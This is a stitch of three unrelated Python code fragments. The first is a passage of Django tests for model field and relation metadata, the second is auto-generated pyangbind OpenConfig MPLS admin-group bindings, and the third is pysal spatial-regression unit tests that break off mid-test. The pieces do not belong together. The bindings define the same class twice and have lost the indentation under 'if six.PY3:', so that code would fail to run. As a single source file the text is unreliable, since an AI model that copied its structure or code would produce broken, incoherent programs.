        # Forward fields and generic FKs count as "direct".
        direct = isinstance(relation, (Field, GenericForeignKey))
        model = relation.model._meta.concrete_model
        if model == current_model:
            model = None
        field = relation if direct else relation.field
        m2m = isinstance(field, related.ManyToManyField)
        return relation, model, direct, m2m
class GetFieldsTests(OptionsBaseTests):
    def test_get_fields_is_immutable(self):
        msg = IMMUTABLE_WARNING % "get_fields()"
        # First pass exercises the uncached result, second the cached one;
        # both must refuse in-place mutation.
        for _ in (0, 1):
            fields = Person._meta.get_fields()
            with self.assertRaisesMessage(AttributeError, msg):
                fields += ["errors"]
class DataTests(OptionsBaseTests):
    def test_fields(self):
        for model, expected_result in TEST_RESULTS['fields'].items():
            self.assertEqual([f.attname for f in model._meta.fields], expected_result)

    def test_local_fields(self):
        def is_data_field(f):
            # A concrete data field: a Field that is not a ManyToManyField.
            return isinstance(f, Field) and not isinstance(f, related.ManyToManyField)

        for model, expected_result in TEST_RESULTS['local_fields'].items():
            fields = model._meta.local_fields
            self.assertEqual([f.attname for f in fields], expected_result)
            for f in fields:
                self.assertEqual(f.model, model)
                self.assertTrue(is_data_field(f))

    def test_local_concrete_fields(self):
        for model, expected_result in TEST_RESULTS['local_concrete_fields'].items():
            fields = model._meta.local_concrete_fields
            self.assertEqual([f.attname for f in fields], expected_result)
            for f in fields:
                # Concrete fields always map to a database column.
                self.assertIsNotNone(f.column)
class M2MTests(OptionsBaseTests):
    def test_many_to_many(self):
        for model, expected_result in TEST_RESULTS['many_to_many'].items():
            m2m_fields = model._meta.many_to_many
            self.assertEqual([f.attname for f in m2m_fields], expected_result)
            for f in m2m_fields:
                self.assertTrue(f.many_to_many and f.is_relation)

    def test_many_to_many_with_model(self):
        for model, expected_result in TEST_RESULTS['many_to_many_with_model'].items():
            resolved = [self._model(model, field) for field in model._meta.many_to_many]
            self.assertEqual(resolved, expected_result)
class RelatedObjectsTests(OptionsBaseTests):
    def key_name(self, r):
        """Sort key for (name, model) pairs: the name component."""
        return r[0]

    def _related_objects(self, model, **kwargs):
        """Return (field, related model) pairs for the reverse relations of
        ``model``, i.e. the auto-created, non-concrete entries produced by
        ``model._meta.get_fields(**kwargs)``."""
        return [
            (field, self._model(model, field))
            for field in model._meta.get_fields(**kwargs)
            if field.auto_created and not field.concrete
        ]

    def test_related_objects(self):
        result_key = 'get_all_related_objects_with_model'
        for model, expected in TEST_RESULTS[result_key].items():
            objects = self._related_objects(model)
            self.assertEqual(self._map_related_query_names(objects), expected)

    def test_related_objects_local(self):
        result_key = 'get_all_related_objects_with_model_local'
        for model, expected in TEST_RESULTS[result_key].items():
            objects = self._related_objects(model, include_parents=False)
            self.assertEqual(self._map_related_query_names(objects), expected)

    def test_related_objects_include_hidden(self):
        result_key = 'get_all_related_objects_with_model_hidden'
        for model, expected in TEST_RESULTS[result_key].items():
            objects = self._related_objects(model, include_hidden=True)
            self.assertEqual(
                sorted(self._map_names(objects), key=self.key_name),
                sorted(expected, key=self.key_name)
            )

    def test_related_objects_include_hidden_local_only(self):
        result_key = 'get_all_related_objects_with_model_hidden_local'
        for model, expected in TEST_RESULTS[result_key].items():
            objects = self._related_objects(model, include_hidden=True, include_parents=False)
            self.assertEqual(
                sorted(self._map_names(objects), key=self.key_name),
                sorted(expected, key=self.key_name)
            )
class VirtualFieldsTests(OptionsBaseTests):
    def test_virtual_fields(self):
        for model, expected_names in TEST_RESULTS['virtual_fields'].items():
            found = sorted(f.name for f in model._meta.virtual_fields)
            self.assertEqual(found, sorted(expected_names))
class GetFieldByNameTests(OptionsBaseTests):
    """Tests for Options.get_field() across field/relation kinds."""
    def test_get_data_field(self):
        field_info = self._details(Person, Person._meta.get_field('data_abstract'))
        self.assertEqual(field_info[1:], (BasePerson, True, False))
        self.assertIsInstance(field_info[0], CharField)
    def test_get_m2m_field(self):
        field_info = self._details(Person, Person._meta.get_field('m2m_base'))
        self.assertEqual(field_info[1:], (BasePerson, True, True))
        self.assertIsInstance(field_info[0], related.ManyToManyField)
    def test_get_related_object(self):
        field_info = self._details(Person, Person._meta.get_field('relating_baseperson'))
        self.assertEqual(field_info[1:], (BasePerson, False, False))
        self.assertIsInstance(field_info[0], related.ForeignObjectRel)
    def test_get_related_m2m(self):
        field_info = self._details(Person, Person._meta.get_field('relating_people'))
        self.assertEqual(field_info[1:], (None, False, True))
        self.assertIsInstance(field_info[0], related.ForeignObjectRel)
    def test_get_generic_relation(self):
        field_info = self._details(Person, Person._meta.get_field('generic_relation_base'))
        self.assertEqual(field_info[1:], (None, True, False))
        self.assertIsInstance(field_info[0], GenericRelation)
    def test_get_fields_only_searaches_forward_on_apps_not_ready(self):
        opts = Person._meta
        # If apps registry is not ready, get_field() searches over only
        # forward fields.
        opts.apps.ready = False
        try:
            # 'data_abstract' is a forward field, and therefore will be found
            self.assertTrue(opts.get_field('data_abstract'))
            msg = (
                "Person has no field named 'relating_baseperson'. The app "
                "cache isn't ready yet, so if this is a forward field, it "
                "won't be available yet."
            )
            # 'relating_baseperson' is a reverse field, and will raise an exception
            with self.assertRaisesMessage(FieldDoesNotExist, msg):
                opts.get_field('relating_baseperson')
        finally:
            opts.apps.ready = True
class RelationTreeTests(TestCase):
    """Tests for the lazily-built ``_relation_tree`` cache on Options."""

    all_models = (Relation, AbstractPerson, BasePerson, Person, ProxyPerson, Relating)

    def setUp(self):
        apps.clear_cache()

    def test_clear_cache_clears_relation_tree(self):
        # The apps.clear_cache() in setUp() should have deleted all trees.
        # Exclude abstract models that are not included in the Apps registry
        # and have no cache.
        all_models_with_cache = (m for m in self.all_models if not m._meta.abstract)
        for m in all_models_with_cache:
            self.assertNotIn('_relation_tree', m._meta.__dict__)

    def test_first_relation_tree_access_populates_all(self):
        # On first access, relation tree should have populated cache.
        self.assertTrue(self.all_models[0]._meta._relation_tree)

        # AbstractPerson does not have any relations, so relation_tree
        # should just return an EMPTY_RELATION_TREE.
        self.assertEqual(AbstractPerson._meta._relation_tree, EMPTY_RELATION_TREE)

        # All the other models should already have their relation tree
        # in the internal __dict__ .
        all_models_but_abstractperson = (m for m in self.all_models if m is not AbstractPerson)
        for m in all_models_but_abstractperson:
            self.assertIn('_relation_tree', m._meta.__dict__)

    def test_relations_related_objects(self):
        # Testing non hidden related objects
        self.assertEqual(
            sorted([field.related_query_name() for field in Relation._meta._relation_tree
                    if not field.rel.field.rel.is_hidden()]),
            sorted([
                'fk_abstract_rel', 'fk_abstract_rel', 'fk_abstract_rel', 'fk_base_rel', 'fk_base_rel',
                'fk_base_rel', 'fk_concrete_rel', 'fk_concrete_rel', 'fo_abstract_rel', 'fo_abstract_rel',
                'fo_abstract_rel', 'fo_base_rel', 'fo_base_rel', 'fo_base_rel', 'fo_concrete_rel',
                'fo_concrete_rel', 'm2m_abstract_rel', 'm2m_abstract_rel', 'm2m_abstract_rel',
                'm2m_base_rel', 'm2m_base_rel', 'm2m_base_rel', 'm2m_concrete_rel', 'm2m_concrete_rel',
            ])
        )
        # Testing hidden related objects
        self.assertEqual(
            sorted([field.related_query_name() for field in BasePerson._meta._relation_tree]),
            sorted([
                '+', '+', 'BasePerson_following_abstract+', 'BasePerson_following_abstract+',
                'BasePerson_following_base+', 'BasePerson_following_base+', 'BasePerson_friends_abstract+',
                'BasePerson_friends_abstract+', 'BasePerson_friends_base+', 'BasePerson_friends_base+',
                'BasePerson_m2m_abstract+', 'BasePerson_m2m_base+', 'Relating_basepeople+',
                'Relating_basepeople_hidden+', 'followers_abstract', 'followers_abstract', 'followers_abstract',
                'followers_base', 'followers_base', 'followers_base', 'friends_abstract_rel_+', 'friends_abstract_rel_+',
                'friends_abstract_rel_+', 'friends_base_rel_+', 'friends_base_rel_+', 'friends_base_rel_+', 'person',
                'person', 'relating_basepeople', 'relating_baseperson',
            ])
        )
        # An abstract model has no entries in the relation tree at all.
        self.assertEqual([field.related_query_name() for field in AbstractPerson._meta._relation_tree], [])
| |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import admin_group
class mpls_admin_groups(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/mpls/te-global-attributes/mpls-admin-groups. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.

    YANG Description: Top-level container for admin-groups configuration
    and state
    """

    # __slots__ keeps per-instance storage fixed; "__admin_group" is
    # name-mangled to _mpls_admin_groups__admin_group, matching the private
    # attribute assigned below.
    __slots__ = ("_path_helper", "_extmethods", "__admin_group")

    _yang_name = "mpls-admin-groups"
    _pybind_generated_by = "container"

    def __init__(self, *args, **kwargs):
        # Path/extmethod helpers are disabled by default; the single YANG
        # child, the keyed 'admin-group' list, is wrapped in YANGDynClass.
        self._path_helper = False
        self._extmethods = False
        self.__admin_group = YANGDynClass(
            base=YANGListType(
                "admin_group_name",
                admin_group.admin_group,
                yang_name="admin-group",
                parent=self,
                is_container="list",
                user_ordered=False,
                path_helper=self._path_helper,
                yang_keys="admin-group-name",
                extensions=None,
            ),
            is_container="list",
            yang_name="admin-group",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="list",
            is_config=True,
        )

        load = kwargs.pop("load", None)
        if args:
            # Copy-construction from another object that exposes the same
            # pyangbind elements; only changed elements are copied over.
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)

    def _path(self):
        # Full YANG path to this container; delegate to the parent when one
        # is registered so nested instances compose their paths correctly.
        if hasattr(self, "_parent"):
            return self._parent._path() + [self._yang_name]
        else:
            return [
                "network-instances",
                "network-instance",
                "mpls",
                "te-global-attributes",
                "mpls-admin-groups",
            ]

    def _get_admin_group(self):
        """
        Getter method for admin_group, mapped from YANG variable /network_instances/network_instance/mpls/te_global_attributes/mpls_admin_groups/admin_group (list)

        YANG Description: configuration of value to name mapping
        for mpls affinities/admin-groups
        """
        return self.__admin_group

    def _set_admin_group(self, v, load=False):
        """
        Setter method for admin_group, mapped from YANG variable /network_instances/network_instance/mpls/te_global_attributes/mpls_admin_groups/admin_group (list)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_admin_group is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_admin_group() directly.

        YANG Description: configuration of value to name mapping
        for mpls affinities/admin-groups
        """
        # Unwrap a user-typed value before revalidating it against the list type.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=YANGListType(
                    "admin_group_name",
                    admin_group.admin_group,
                    yang_name="admin-group",
                    parent=self,
                    is_container="list",
                    user_ordered=False,
                    path_helper=self._path_helper,
                    yang_keys="admin-group-name",
                    extensions=None,
                ),
                is_container="list",
                yang_name="admin-group",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                extensions=None,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="list",
                is_config=True,
            )
        except (TypeError, ValueError):
            # Re-raise with a structured error payload describing the expected type.
            raise ValueError(
                {
                    "error-string": """admin_group must be of a type compatible with list""",
                    "defined-type": "list",
                    "generated-type": """YANGDynClass(base=YANGListType("admin_group_name",admin_group.admin_group, yang_name="admin-group", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='admin-group-name', extensions=None), is_container='list', yang_name="admin-group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='list', is_config=True)""",
                }
            )

        self.__admin_group = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_admin_group(self):
        # Reset the list back to its default (empty) generated state.
        self.__admin_group = YANGDynClass(
            base=YANGListType(
                "admin_group_name",
                admin_group.admin_group,
                yang_name="admin-group",
                parent=self,
                is_container="list",
                user_ordered=False,
                path_helper=self._path_helper,
                yang_keys="admin-group-name",
                extensions=None,
            ),
            is_container="list",
            yang_name="admin-group",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="list",
            is_config=True,
        )

    # Public property plus the element registry used by PybindBase
    # serialisation helpers.
    admin_group = __builtin__.property(_get_admin_group, _set_admin_group)

    _pyangbind_elements = OrderedDict([("admin_group", admin_group)])
from . import admin_group
class mpls_admin_groups(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/mpls/te-global-attributes/mpls-admin-groups. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.

    YANG Description: Top-level container for admin-groups configuration
    and state
    """

    # NOTE(review): this second definition shadows the identically named
    # class defined earlier in the same module; this looks like two
    # generated bindings concatenated into one file — confirm the intended
    # module layout.
    # __slots__ keeps per-instance storage fixed; "__admin_group" is
    # name-mangled to _mpls_admin_groups__admin_group.
    __slots__ = ("_path_helper", "_extmethods", "__admin_group")

    _yang_name = "mpls-admin-groups"
    _pybind_generated_by = "container"

    def __init__(self, *args, **kwargs):
        # Path/extmethod helpers are disabled by default; the single YANG
        # child, the keyed 'admin-group' list, is wrapped in YANGDynClass.
        self._path_helper = False
        self._extmethods = False
        self.__admin_group = YANGDynClass(
            base=YANGListType(
                "admin_group_name",
                admin_group.admin_group,
                yang_name="admin-group",
                parent=self,
                is_container="list",
                user_ordered=False,
                path_helper=self._path_helper,
                yang_keys="admin-group-name",
                extensions=None,
            ),
            is_container="list",
            yang_name="admin-group",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="list",
            is_config=True,
        )

        load = kwargs.pop("load", None)
        if args:
            # Copy-construction from another object that exposes the same
            # pyangbind elements; only changed elements are copied over.
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)

    def _path(self):
        # Full YANG path to this container; delegate to the parent when one
        # is registered so nested instances compose their paths correctly.
        if hasattr(self, "_parent"):
            return self._parent._path() + [self._yang_name]
        else:
            return [
                "network-instances",
                "network-instance",
                "mpls",
                "te-global-attributes",
                "mpls-admin-groups",
            ]

    def _get_admin_group(self):
        """
        Getter method for admin_group, mapped from YANG variable /network_instances/network_instance/mpls/te_global_attributes/mpls_admin_groups/admin_group (list)

        YANG Description: configuration of value to name mapping
        for mpls affinities/admin-groups
        """
        return self.__admin_group

    def _set_admin_group(self, v, load=False):
        """
        Setter method for admin_group, mapped from YANG variable /network_instances/network_instance/mpls/te_global_attributes/mpls_admin_groups/admin_group (list)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_admin_group is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_admin_group() directly.

        YANG Description: configuration of value to name mapping
        for mpls affinities/admin-groups
        """
        # Unwrap a user-typed value before revalidating it against the list type.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=YANGListType(
                    "admin_group_name",
                    admin_group.admin_group,
                    yang_name="admin-group",
                    parent=self,
                    is_container="list",
                    user_ordered=False,
                    path_helper=self._path_helper,
                    yang_keys="admin-group-name",
                    extensions=None,
                ),
                is_container="list",
                yang_name="admin-group",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                extensions=None,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="list",
                is_config=True,
            )
        except (TypeError, ValueError):
            # Re-raise with a structured error payload describing the expected type.
            raise ValueError(
                {
                    "error-string": """admin_group must be of a type compatible with list""",
                    "defined-type": "list",
                    "generated-type": """YANGDynClass(base=YANGListType("admin_group_name",admin_group.admin_group, yang_name="admin-group", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='admin-group-name', extensions=None), is_container='list', yang_name="admin-group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='list', is_config=True)""",
                }
            )

        self.__admin_group = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_admin_group(self):
        # Reset the list back to its default (empty) generated state.
        self.__admin_group = YANGDynClass(
            base=YANGListType(
                "admin_group_name",
                admin_group.admin_group,
                yang_name="admin-group",
                parent=self,
                is_container="list",
                user_ordered=False,
                path_helper=self._path_helper,
                yang_keys="admin-group-name",
                extensions=None,
            ),
            is_container="list",
            yang_name="admin-group",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="list",
            is_config=True,
        )

    # Public property plus the element registry used by PybindBase
    # serialisation helpers.
    admin_group = __builtin__.property(_get_admin_group, _set_admin_group)

    _pyangbind_elements = OrderedDict([("admin_group", admin_group)])
| |
import unittest
import pysal
import numpy as np
from pysal.spreg import error_sp as SP
from scipy import sparse
class TestBaseGMError(unittest.TestCase):
    """Regression test for error_sp.BaseGM_Error on the columbus sample data."""

    def setUp(self):
        # y = HOVAL; X = [constant, INC, CRIME] as a sparse CSR matrix;
        # w = row-standardised rook contiguity weights.
        db = pysal.open(pysal.examples.get_path("columbus.dbf"), "r")
        y = np.array(db.by_col("HOVAL"))
        self.y = np.reshape(y, (49, 1))
        X = []
        X.append(db.by_col("INC"))
        X.append(db.by_col("CRIME"))
        self.X = np.array(X).T
        self.X = np.hstack((np.ones(self.y.shape), self.X))
        self.X = sparse.csr_matrix(self.X)
        self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
        self.w.transform = 'r'

    def test_model(self):
        # Compare estimates and diagnostics against known-good values.
        reg = SP.BaseGM_Error(self.y, self.X, self.w.sparse)
        betas = np.array([[47.94371455], [0.70598088], [-0.55571746], [0.37230161]])
        np.testing.assert_array_almost_equal(reg.betas, betas, 6)
        u = np.array([27.4739775])
        np.testing.assert_array_almost_equal(reg.u[0], u, 6)
        predy = np.array([52.9930255])
        np.testing.assert_array_almost_equal(reg.predy[0], predy, 6)
        n = 49
        self.assertAlmostEqual(reg.n, n, 6)
        k = 3
        self.assertAlmostEqual(reg.k, k, 6)
        y = np.array([80.467003])
        np.testing.assert_array_almost_equal(reg.y[0], y, 6)
        x = np.array([1., 19.531, 15.72598])
        np.testing.assert_array_almost_equal(reg.x.toarray()[0], x, 6)
        e = np.array([31.89620319])
        np.testing.assert_array_almost_equal(reg.e_filtered[0], e, 6)
        predy = np.array([52.9930255])
        np.testing.assert_array_almost_equal(reg.predy[0], predy, 6)
        my = 38.43622446938776
        self.assertAlmostEqual(reg.mean_y, my)
        sy = 18.466069465206047
        self.assertAlmostEqual(reg.std_y, sy)
        vm = np.array([[1.51884943e+02, -5.37622793e+00, -1.86970286e+00],
                       [-5.37622793e+00, 2.48972661e-01, 5.26564244e-02],
                       [-1.86970286e+00, 5.26564244e-02, 3.18930650e-02]])
        np.testing.assert_array_almost_equal(reg.vm, vm, 6)
        sig2 = 191.73716465732355
        self.assertAlmostEqual(reg.sig2, sig2, 5)
class TestGMError(unittest.TestCase):
    """Regression test for the user-facing error_sp.GM_Error wrapper."""

    def setUp(self):
        # Unlike the Base class test, the constant column is added by the
        # GM_Error wrapper itself, so X is just [INC, CRIME].
        db = pysal.open(pysal.examples.get_path("columbus.dbf"), "r")
        y = np.array(db.by_col("HOVAL"))
        self.y = np.reshape(y, (49, 1))
        X = []
        X.append(db.by_col("INC"))
        X.append(db.by_col("CRIME"))
        self.X = np.array(X).T
        self.X = sparse.csr_matrix(self.X)
        self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
        self.w.transform = 'r'

    def test_model(self):
        reg = SP.GM_Error(self.y, self.X, self.w)
        betas = np.array([[47.94371455], [0.70598088], [-0.55571746], [0.37230161]])
        np.testing.assert_array_almost_equal(reg.betas, betas, 6)
        u = np.array([27.4739775])
        np.testing.assert_array_almost_equal(reg.u[0], u, 6)
        predy = np.array([52.9930255])
        np.testing.assert_array_almost_equal(reg.predy[0], predy, 6)
        n = 49
        self.assertAlmostEqual(reg.n, n, 6)
        k = 3
        self.assertAlmostEqual(reg.k, k, 6)
        y = np.array([80.467003])
        np.testing.assert_array_almost_equal(reg.y[0], y, 6)
        x = np.array([1., 19.531, 15.72598])
        np.testing.assert_array_almost_equal(reg.x.toarray()[0], x, 6)
        e = np.array([31.89620319])
        np.testing.assert_array_almost_equal(reg.e_filtered[0], e, 6)
        predy = np.array([52.9930255])
        np.testing.assert_array_almost_equal(reg.predy[0], predy, 6)
        my = 38.43622446938776
        self.assertAlmostEqual(reg.mean_y, my)
        sy = 18.466069465206047
        self.assertAlmostEqual(reg.std_y, sy)
        vm = np.array([[1.51884943e+02, -5.37622793e+00, -1.86970286e+00],
                       [-5.37622793e+00, 2.48972661e-01, 5.26564244e-02],
                       [-1.86970286e+00, 5.26564244e-02, 3.18930650e-02]])
        np.testing.assert_array_almost_equal(reg.vm, vm, 6)
        sig2 = 191.73716465732355
        self.assertAlmostEqual(reg.sig2, sig2, 5)
        # Inference diagnostics only exposed on the user-facing class.
        pr2 = 0.3495097406012179
        self.assertAlmostEqual(reg.pr2, pr2)
        std_err = np.array([12.32416094, 0.4989716, 0.1785863])
        np.testing.assert_array_almost_equal(reg.std_err, std_err, 6)
        z_stat = np.array([[3.89022140e+00, 1.00152805e-04],
                           [1.41487186e+00, 1.57106070e-01],
                           [-3.11175868e+00, 1.85976455e-03]])
        np.testing.assert_array_almost_equal(reg.z_stat, z_stat, 6)
class TestBaseGMEndogError(unittest.TestCase):
    """Regression test for error_sp.BaseGM_Endog_Error (endogenous CRIME, instrument DISCBD)."""

    def setUp(self):
        # y = HOVAL; exogenous X = [constant, INC]; endogenous yd = CRIME;
        # instrument q = DISCBD; rook weights row-standardised.
        db = pysal.open(pysal.examples.get_path("columbus.dbf"), "r")
        y = np.array(db.by_col("HOVAL"))
        self.y = np.reshape(y, (49, 1))
        X = []
        X.append(db.by_col("INC"))
        self.X = np.array(X).T
        self.X = np.hstack((np.ones(self.y.shape), self.X))
        self.X = sparse.csr_matrix(self.X)
        yd = []
        yd.append(db.by_col("CRIME"))
        self.yd = np.array(yd).T
        q = []
        q.append(db.by_col("DISCBD"))
        self.q = np.array(q).T
        self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
        self.w.transform = 'r'

    def test_model(self):
        reg = SP.BaseGM_Endog_Error(self.y, self.X, self.yd, self.q, self.w.sparse)
        betas = np.array([[55.36095292], [0.46411479], [-0.66883535], [0.38989939]])
        np.testing.assert_array_almost_equal(reg.betas, betas, 6)
        u = np.array([26.55951566])
        np.testing.assert_array_almost_equal(reg.u[0], u, 6)
        e = np.array([31.23925425])
        np.testing.assert_array_almost_equal(reg.e_filtered[0], e, 6)
        predy = np.array([53.9074875])
        np.testing.assert_array_almost_equal(reg.predy[0], predy, 6)
        n = 49
        self.assertAlmostEqual(reg.n, n)
        k = 3
        self.assertAlmostEqual(reg.k, k)
        y = np.array([80.467003])
        np.testing.assert_array_almost_equal(reg.y[0], y, 6)
        x = np.array([1., 19.531])
        np.testing.assert_array_almost_equal(reg.x.toarray()[0], x, 6)
        yend = np.array([15.72598])
        np.testing.assert_array_almost_equal(reg.yend[0], yend, 6)
        z = np.array([1., 19.531, 15.72598])
        np.testing.assert_array_almost_equal(reg.z.toarray()[0], z, 6)
        my = 38.43622446938776
        self.assertAlmostEqual(reg.mean_y, my)
        # std_y
        sy = 18.466069465206047
        self.assertAlmostEqual(reg.std_y, sy)
        # vm
        vm = np.array([[529.15644447, -15.78333817, -8.38016887],
                       [-15.78333817, 0.54023465, 0.2311196],
                       [-8.38016887, 0.2311196, 0.14497647]])
        np.testing.assert_array_almost_equal(reg.vm, vm, 5)
        sig2 = 192.50040382591442
        self.assertAlmostEqual(reg.sig2, sig2, 5)
class TestGMEndogError(unittest.TestCase):
    """Regression test for the user-facing error_sp.GM_Endog_Error wrapper."""

    def setUp(self):
        # The wrapper adds the constant itself, so X = [INC] only;
        # endogenous yd = CRIME, instrument q = DISCBD.
        db = pysal.open(pysal.examples.get_path("columbus.dbf"), "r")
        y = np.array(db.by_col("HOVAL"))
        self.y = np.reshape(y, (49, 1))
        X = []
        X.append(db.by_col("INC"))
        self.X = np.array(X).T
        self.X = sparse.csr_matrix(self.X)
        yd = []
        yd.append(db.by_col("CRIME"))
        self.yd = np.array(yd).T
        q = []
        q.append(db.by_col("DISCBD"))
        self.q = np.array(q).T
        self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
        self.w.transform = 'r'

    def test_model(self):
        reg = SP.GM_Endog_Error(self.y, self.X, self.yd, self.q, self.w)
        betas = np.array([[55.36095292], [0.46411479], [-0.66883535], [0.38989939]])
        np.testing.assert_array_almost_equal(reg.betas, betas, 6)
        u = np.array([26.55951566])
        np.testing.assert_array_almost_equal(reg.u[0], u, 6)
        e = np.array([31.23925425])
        np.testing.assert_array_almost_equal(reg.e_filtered[0], e, 6)
        predy = np.array([53.9074875])
        np.testing.assert_array_almost_equal(reg.predy[0], predy, 6)
        n = 49
        self.assertAlmostEqual(reg.n, n)
        k = 3
        self.assertAlmostEqual(reg.k, k)
        y = np.array([80.467003])
        np.testing.assert_array_almost_equal(reg.y[0], y, 6)
        x = np.array([1., 19.531])
        np.testing.assert_array_almost_equal(reg.x.toarray()[0], x, 6)
        yend = np.array([15.72598])
        np.testing.assert_array_almost_equal(reg.yend[0], yend, 6)
        z = np.array([1., 19.531, 15.72598])
        np.testing.assert_array_almost_equal(reg.z.toarray()[0], z, 6)
        my = 38.43622446938776
        self.assertAlmostEqual(reg.mean_y, my)
        sy = 18.466069465206047
        self.assertAlmostEqual(reg.std_y, sy)
        vm = np.array([[529.15644447, -15.78333817, -8.38016887],
                       [-15.78333817, 0.54023465, 0.2311196],
                       [-8.38016887, 0.2311196, 0.14497647]])
        np.testing.assert_array_almost_equal(reg.vm, vm, 5)
        # Inference diagnostics only exposed on the user-facing class.
        pr2 = 0.346472557570858
        self.assertAlmostEqual(reg.pr2, pr2)
        sig2 = 192.50040382591442
        self.assertAlmostEqual(reg.sig2, sig2, 5)
        std_err = np.array([23.003401, 0.73500657, 0.38075777])
        np.testing.assert_array_almost_equal(reg.std_err, std_err, 6)
        z_stat = np.array([[2.40664208, 0.01609994],
                           [0.63144305, 0.52775088],
                           [-1.75659016, 0.07898769]])
        np.testing.assert_array_almost_equal(reg.z_stat, z_stat, 6)
class TestBaseGMCombo(unittest.TestCase):
    """Regression test for error_sp.BaseGM_Combo (spatial lag + error model)."""

    def setUp(self):
        # X starts dense here: test_model needs the dense matrix to build
        # the spatial-lag instruments before converting to sparse.
        db = pysal.open(pysal.examples.get_path("columbus.dbf"), "r")
        y = np.array(db.by_col("HOVAL"))
        self.y = np.reshape(y, (49, 1))
        X = []
        X.append(db.by_col("INC"))
        X.append(db.by_col("CRIME"))
        self.X = np.array(X).T
        self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
        self.w.transform = 'r'

    def test_model(self):
        # Only spatial lag
        yd2, q2 = pysal.spreg.utils.set_endog(self.y, self.X, self.w, None, None, 1, True)
        self.X = np.hstack((np.ones(self.y.shape), self.X))
        self.X = sparse.csr_matrix(self.X)
        reg = SP.BaseGM_Combo(self.y, self.X, yend=yd2, q=q2, w=self.w.sparse)
        betas = np.array([[57.61123461], [0.73441314], [-0.59459416], [-0.21762921], [0.54732051]])
        np.testing.assert_array_almost_equal(reg.betas, betas, 5)
        u = np.array([25.57932637])
        np.testing.assert_array_almost_equal(reg.u[0], u, 6)
        e_filtered = np.array([31.65374945])
        np.testing.assert_array_almost_equal(reg.e_filtered[0], e_filtered, 5)
        predy = np.array([54.88767663])
        np.testing.assert_array_almost_equal(reg.predy[0], predy, 6)
        n = 49
        self.assertAlmostEqual(reg.n, n)
        k = 4
        self.assertAlmostEqual(reg.k, k)
        y = np.array([80.467003])
        np.testing.assert_array_almost_equal(reg.y[0], y, 6)
        x = np.array([1., 19.531, 15.72598])
        np.testing.assert_array_almost_equal(reg.x.toarray()[0], x, 6)
        yend = np.array([35.4585005])
